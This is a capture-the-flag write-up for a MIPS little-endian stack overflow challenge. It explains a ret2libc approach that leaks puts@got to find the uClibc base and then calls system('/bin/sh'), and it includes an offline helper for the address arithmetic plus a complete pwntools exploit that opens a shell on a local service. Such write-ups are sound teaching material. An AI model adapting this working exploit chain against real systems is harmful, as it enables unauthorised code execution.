Writeup source
https://xz.aliyun.com/t/6912
Challenge topics
Approach
Analysis
Reversing the binary shows a stack overflow in the vuln function.
There is no system function in the binary, so a ret2libc attack is needed: first leak a GOT entry (the EXP leaks puts@got through puts), subtract the symbol's offset in the target libc (uClibc 0.9.33.2, mipsel) to get the libc base, then call system.
The "/bin/sh" string is also present in libc, so system("/bin/sh") can be called directly with the string's libc address.
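The leak-to-address arithmetic above is where these exploits usually go wrong (wrong libc build, a stray byte in the stream, or a "/bin/sh" offset copied from the wrong library), so here is an added example, not part of the original writeup, that performs the stage-2 computation offline with a sanity check. The symbol offsets, the leaked value and the libc image are hypothetical stand-ins constructed inline; the real "/bin/sh" offset in libuClibc-0.9.33.2.so is the 0x9bc48 used in the EXP below.

```python
import struct

PAGE_SIZE = 0x1000

# Constructed stand-in for a libc image: padding, then "/bin/sh\0" at 0x100.
# In the real libuClibc-0.9.33.2.so the string sits at 0x9bc48 (see EXP).
SAMPLE_LIBC_IMAGE = b"\x00" * 0x100 + b"/bin/sh\x00" + b"\x00" * 0x40

# Hypothetical symbol offsets, NOT the real uClibc values; in practice
# read them from ELF(libc).symbols as the EXP does.
PUTS_OFFSET = 0x5c9d0
SYSTEM_OFFSET = 0x5a270


def parse_leak_le32(raw):
    """Decode the 4 leaked bytes as a little-endian u32 (mipsel), like u32()."""
    if len(raw) != 4:
        raise ValueError("expected 4 leaked bytes, got %d" % len(raw))
    return struct.unpack("<I", raw)[0]


def libc_base_from_leak(leaked_puts, puts_offset=PUTS_OFFSET):
    """libc base = leaked puts@got - offset of puts inside libc.

    Shared libraries are mapped page-aligned, so a base that is not a
    multiple of the page size means the leak was read from the wrong
    position in the stream or the local libc does not match the target.
    """
    base = leaked_puts - puts_offset
    if base & (PAGE_SIZE - 1):
        raise ValueError("libc base 0x%x is not page aligned: wrong libc or bad leak" % base)
    return base


def find_binsh_offset(libc_image):
    """Offset of "/bin/sh\\0" in the libc image; this is how a constant like
    the EXP's 0x9bc48 is obtained. Assumes the string lives in a PT_LOAD
    segment with p_vaddr == p_offset (true for libc's first segment); for
    other segments map file offset to vaddr via the program headers."""
    off = libc_image.find(b"/bin/sh\x00")
    if off < 0:
        raise ValueError("/bin/sh not found in libc image")
    return off


def ret2libc_targets(leak_raw, libc_image, puts_offset=PUTS_OFFSET, system_offset=SYSTEM_OFFSET):
    """Turn the raw leak into the addresses stage 2 of the exploit needs."""
    base = libc_base_from_leak(parse_leak_le32(leak_raw), puts_offset)
    return {
        "libc_base": base,
        "system": base + system_offset,
        "binsh": base + find_binsh_offset(libc_image),
    }


if __name__ == "__main__":
    # Constructed leak: puts@got resolved with libc mapped at 0x77f00000.
    leak = struct.pack("<I", 0x77f00000 + PUTS_OFFSET)
    for name, addr in ret2libc_targets(leak, SAMPLE_LIBC_IMAGE).items():
        print("%-9s 0x%08x" % (name, addr))
```

With pwntools the same string search is `next(libc.search(b"/bin/sh\x00"))`, which already walks the program headers, so prefer it over a raw file scan when the libc is at hand; the alignment check is worth keeping either way, since an off-by-one in `r.recv()` before the 4-byte read silently produces a plausible-looking but wrong base.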
EXP
```python
from pwn import *

# Target is little-endian MIPS; p32/u32 default to little endian, which matches.
context(arch="mips", endian="little")

r = remote("127.0.0.1", 8881)
elf = ELF("./pwn2")
libc = ELF("/home/h4lo/mipsel-env/lib/libuClibc-0.9.33.2.so")

# First prompt: answer it, then drain the output before the vulnerable read.
payload = b"H4lo"
r.recvuntil(b"What's your name:")
r.sendline(payload)
sleep(0.2)
r.recv()
sleep(0.2)

# Stage 1: overflow the stack frame of vuln and chain gadgets from ./pwn2
# to print the GOT entry of puts, then come back for a second overflow.
payload  = p32(1) * 9
payload += p32(0x004006C8)
payload += p32(1)
payload += b"a" * 0x18
payload += b"a" * 4
payload += p32(0x00410B58)
payload += p32(0x0040092C)
payload += b"a" * 4
payload += p32(0x004007A4)
payload += b"a" * 0x20
payload += p32(0x004007C4)
sleep(0.2)
r.send(payload)

# Skip the echoed output, then read the 4 leaked bytes of puts@got.
r.recv()
libc_addr = u32(r.recv(4)) - libc.symbols['puts']
success("libc_addr: " + hex(libc_addr))
r.recv()

# Stage 2: ret2libc, system("/bin/sh") with the string taken from libc itself
# (0x9bc48 is the offset of "/bin/sh" in this uClibc build).
system_addr = libc_addr + libc.symbols['system']
binsh_addr = libc_addr + 0x9bc48
payload  = b"a" * 0x24
payload += p32(0x004006C8)
payload += b"a" * 0x1c
payload += b"a" * 4
payload += p32(binsh_addr)
payload += p32(system_addr)
payload += b"a" * 4
payload += p32(0x004007A4)
r.send(payload)
r.interactive()
```